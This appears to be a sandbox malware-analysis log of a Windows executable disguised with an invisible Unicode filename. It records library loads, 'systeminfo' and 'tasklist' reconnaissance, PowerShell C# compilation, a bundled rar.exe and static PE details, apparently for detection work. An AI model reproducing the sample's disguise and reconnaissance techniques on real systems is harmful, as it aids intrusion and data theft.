Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll

Source: C:\Windows\System32\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: #U202f#U202f#U2005#U00a0.scr.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: #U202f#U202f#U2005#U00a0.scr.exe

Static file information: File size 8505922 > 1048576

Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: #U202f#U202f#U2005#U00a0.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: #U202f#U202f#U2005#U00a0.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdb source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342094311.00007FF8B9071000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340877451.00007FF8B8CB1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343290926.00007FF8B9F61000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdbhPu source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342474030.00007FF8B93C1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
